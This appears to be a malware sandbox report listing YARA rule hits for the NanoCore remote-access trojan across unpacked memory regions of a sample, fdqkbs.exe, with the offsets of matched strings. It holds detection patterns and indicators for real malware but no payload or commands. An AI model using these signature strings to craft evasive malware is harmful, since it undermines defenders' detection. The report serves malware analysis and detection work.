3.2.fdqkbs.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x26f5d:$x1: NanoCore Client.exe 0x271e5:$x2: NanoCore.ClientPluginHost 0x2881e:$s1: PluginCommand 0x28812:$s2: FileCommand 0x296c3:$s3: PipeExists 0x2f47a:$s4: PipeCreated 0x2720f:$s5: IClientLoggingHost
3.2.fdqkbs.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.400000.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x26f4d:$x1: NanoCore Client 0x26f5d:$x1: NanoCore Client 0x271a5:$x2: NanoCore.ClientPlugin 0x271e5:$x3: NanoCore.ClientPluginHost 0x2719a:$i1: IClientApp 0x271bb:$i2: IClientData 0x271c7:$i3: IClientNetwork 0x271d6:$i4: IClientAppHost 0x271ff:$i5: IClientDataHost 0x2720f:$i6: IClientLoggingHost 0x27222:$i7: IClientNetworkHost 0x27235:$i8: IClientUIHost 0x27243:$i9: IClientNameObjectCollection 0x2725f:$i10: IClientReadOnlyNameObjectCollection 0x26fac:$s1: ClientPlugin 0x271ae:$s1: ClientPlugin 0x276a2:$s2: EndPoint 0x276ab:$s3: IPAddress 0x276b5:$s4: IPEndPoint 0x290eb:$s6: get_ClientSettings 0x2968f:$s7: get_Connected
3.2.fdqkbs.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x26f4d:$a: NanoCore 0x26f5d:$a: NanoCore 0x27191:$a: NanoCore 0x271a5:$a: NanoCore 0x271e5:$a: NanoCore 0x26fac:$b: ClientPlugin 0x271ae:$b: ClientPlugin 0x271ee:$b: ClientPlugin 0x270d3:$c: ProjectData 0x27ada:$d: DESCrypto 0x2f4a6:$e: KeepAlive 0x2d494:$g: LogClientMessage 0x2968f:$i: get_Connected 0x27e10:$j: #=q 0x27e40:$j: #=q 0x27e5c:$j: #=q 0x27e8c:$j: #=q 0x27ea8:$j: #=q 0x27ec4:$j: #=q 0x27ef4:$j: #=q 0x27f10:$j: #=q
3.2.fdqkbs.exe.400000.1.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x271e5:$a1: NanoCore.ClientPluginHost 0x271a5:$a2: NanoCore.ClientPlugin 0x290fe:$b1: get_BuilderSettings 0x27001:$b2: ClientLoaderForm.resources 0x2881e:$b3: PluginCommand 0x271d6:$b4: IClientAppHost 0x31656:$b5: GetBlockHash 0x29756:$b6: AddHostEntry 0x2d449:$b7: LogClientException 0x296c3:$b8: PipeExists 0x2720f:$b9: IClientLoggingHost
3.2.fdqkbs.exe.417058.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.417058.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.417058.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.417058.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
3.2.fdqkbs.exe.417058.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.2.fdqkbs.exe.417058.0.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.2480000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.2480000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.2480000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.2480000.3.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
3.2.fdqkbs.exe.2480000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
3.2.fdqkbs.exe.2480000.3.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.34e5530.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.34e5530.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.34e5530.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.34e5530.6.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
3.2.fdqkbs.exe.34e5530.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.fdqkbs.exe.34e5530.6.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.35631e4.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
3.2.fdqkbs.exe.35631e4.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.35631e4.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.35631e4.8.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xd978:$x2: NanoCore.ClientPlugin 0xd9ad:$x3: NanoCore.ClientPluginHost 0xd96c:$i2: IClientData 0xd98e:$i3: IClientNetwork 0xd99d:$i5: IClientDataHost 0xd9c7:$i6: IClientLoggingHost 0xd9da:$i7: IClientNetworkHost 0xd9ed:$i8: IClientUIHost 0xd9fb:$i9: IClientNameObjectCollection 0xda17:$i10: IClientReadOnlyNameObjectCollection 0xd76a:$s1: ClientPlugin 0xd981:$s1: ClientPlugin 0x129a2:$s6: get_ClientSettings
3.2.fdqkbs.exe.35631e4.8.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xd9ad:$a1: NanoCore.ClientPluginHost 0xd978:$a2: NanoCore.ClientPlugin 0x128f3:$b1: get_BuilderSettings 0x12862:$b7: LogClientException 0xd9c7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.356780d.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x1: NanoCore.ClientPluginHost 0x24188:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241b5:$x2: IClientNetworkHost
3.2.fdqkbs.exe.356780d.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xb184:$x2: NanoCore.ClientPluginHost 0x24188:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25263:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241a2:$s5: IClientLoggingHost
3.2.fdqkbs.exe.356780d.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.356780d.7.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xb14f:$x2: NanoCore.ClientPlugin 0x24153:$x2: NanoCore.ClientPlugin 0xb184:$x3: NanoCore.ClientPluginHost 0x24188:$x3: NanoCore.ClientPluginHost 0xb143:$i2: IClientData 0x24147:$i2: IClientData 0xb165:$i3: IClientNetwork 0x24169:$i3: IClientNetwork 0xb174:$i5: IClientDataHost 0x24178:$i5: IClientDataHost 0xb19e:$i6: IClientLoggingHost 0x241a2:$i6: IClientLoggingHost 0xb1b1:$i7: IClientNetworkHost 0x241b5:$i7: IClientNetworkHost 0xb1c4:$i8: IClientUIHost 0x241c8:$i8: IClientUIHost 0xb1d2:$i9: IClientNameObjectCollection 0x241d6:$i9: IClientNameObjectCollection 0xb1ee:$i10: IClientReadOnlyNameObjectCollection 0x241f2:$i10: IClientReadOnlyNameObjectCollection 0xaf41:$s1: ClientPlugin
3.2.fdqkbs.exe.356780d.7.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0x24188:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x24153:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x290ce:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0x2903d:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost 0x241a2:$b9: IClientLoggingHost
3.2.fdqkbs.exe.4910000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.4910000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.4910000.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.4910000.9.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
3.2.fdqkbs.exe.4910000.9.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.fdqkbs.exe.4910000.9.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.2480000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.2480000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.2480000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.2480000.3.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
3.2.fdqkbs.exe.2480000.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.fdqkbs.exe.2480000.3.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.6240e0.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.6240e0.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.6240e0.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.6240e0.2.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
3.2.fdqkbs.exe.6240e0.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.fdqkbs.exe.6240e0.2.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
3.2.fdqkbs.exe.35631e4.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287de:$x2: IClientNetworkHost
3.2.fdqkbs.exe.35631e4.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2988c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287cb:$s5: IClientLoggingHost
3.2.fdqkbs.exe.35631e4.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.35631e4.8.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0x2877c:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0x287b1:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0x28770:$i2: IClientData 0xf78e:$i3: IClientNetwork 0x28792:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0x287a1:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0x287cb:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0x287de:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0x287f1:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0x287ff:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0x2881b:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin
3.2.fdqkbs.exe.35631e4.8.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0x287b1:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x2877c:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x2d6f7:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0x2d666:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost 0x287cb:$b9: IClientLoggingHost
3.2.fdqkbs.exe.6240e0.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.fdqkbs.exe.6240e0.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
3.2.fdqkbs.exe.6240e0.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.fdqkbs.exe.6240e0.2.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
